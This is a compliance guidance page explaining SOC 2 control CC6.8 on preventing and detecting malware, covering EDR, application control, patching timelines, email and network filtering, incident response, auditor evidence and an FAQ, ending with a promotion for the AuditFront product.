CC6.8 SOC 2

SOC 2 CC6.8: Logical and Physical Access - Prevention and Detection of Unauthorized Software

What This Control Requires

The entity implements controls to prevent or detect and act on the introduction of unauthorized or malicious software to meet the entity's objectives. The entity uses detection and prevention measures to identify and respond to malware, ransomware, and other unauthorized software installations.

In Plain Language

Malware remains one of the most common and damaging attack vectors. A single ransomware infection can take down operations for days, and a well-placed trojan can exfiltrate data for months before detection. CC6.8 is about having both the prevention and detection layers to stop this from happening.

In practice, you need anti-malware or EDR on all endpoints and servers, application control policies limiting what can be installed and run, a patch management programme that closes known vulnerabilities quickly, and monitoring across the environment for signs of malicious activity.

Auditors test this by looking at deployment coverage (are all endpoints actually protected?), update status (are signatures and agents current?), patching compliance, and incident response history. Gaps in any of these areas are common findings.

How to Implement

Deploy endpoint detection and response (EDR) or anti-malware on every endpoint - workstations, laptops, and servers. Make sure the solution provides real-time protection, behavioural analysis, and automated response. Configure automatic signature updates and use the management console to track deployment coverage and alert status.

Restrict software installation. Remove local admin rights from standard users so they can't install software without IT approval. Maintain an approved software catalogue and set up a request process for new applications. For high-security environments, consider application whitelisting.

Set up a patch management programme with clear timelines based on severity: critical patches within 14 days, high within 30, medium within 60, low within 90. Track compliance across all systems and report on patch status regularly.

Secure the most common malware delivery vector: email. Deploy filtering with anti-malware scanning, URL rewriting and sandboxing, attachment sandboxing, and anti-phishing protections. Quarantine or block anything suspicious.

Add network-based malware detection at boundary points: IDS/IPS with malware signatures, DNS filtering to block known malicious domains, and network traffic analysis to catch command-and-control communications.

Document your malware incident response procedures. Define how alerts are triaged, investigated, contained, and remediated. Make sure you can isolate infected systems quickly, preserve forensic evidence, and perform root cause analysis. Run tabletop exercises of malware scenarios regularly.

Evidence Your Auditor Will Request

EDR/anti-malware deployment records showing coverage across all endpoints and servers
Anti-malware solution configuration including automatic update status and scan schedules
Application control policy and evidence of enforcement (restricted admin rights, approved software list)
Patch management records showing compliance with defined patching timelines
Malware incident response procedures and records of recent incidents and responses

Common Mistakes

Anti-malware solution is not deployed on all endpoints, leaving coverage gaps on servers or specialized systems
Malware definitions are not updated automatically, leaving systems vulnerable to recent threats
Users have local administrator rights, enabling installation of unauthorized or malicious software
Patch management is inconsistent, with critical vulnerabilities remaining unpatched beyond defined timelines
Malware alerts are generated but not reviewed or investigated in a timely manner

Related Controls Across Frameworks

Framework	Control ID	Relationship
ISO 27001	A.8.7	Equivalent
ISO 27001	A.8.8	Related
ISO 27001	A.8.19	Partial overlap
nist-csf	DE.CM-01	Related

Frequently Asked Questions

Should we use traditional antivirus or EDR?

Go with EDR if you can. It gives you behavioural analysis, threat hunting, automated response, and forensic capabilities that traditional antivirus simply doesn't have. Most modern threats evade signature-based detection anyway. If budget is tight, a next-gen antivirus with behavioural analysis is the minimum you should deploy.

How do we protect Linux servers that cannot run traditional antivirus?

Several EDR and anti-malware solutions now support Linux. Deploy Linux-compatible security agents for malware detection, file integrity monitoring, and behavioural analysis. Layer on network-based detection, strict access controls, application whitelisting, and regular vulnerability scanning. Make sure Linux servers are part of your patch management programme too - they often get overlooked.

Should we block all USB devices?

Blocking all USB storage devices is the cleanest approach and removes a common malware delivery vector entirely. If USB devices are genuinely needed for business, implement a whitelist of approved encrypted devices, scan on insertion, and log all usage. The more you can restrict here, the less risk you carry.

Track SOC 2 compliance in one place

AuditFront helps you manage every SOC 2 control, collect evidence, and stay audit-ready.

Start Free Assessment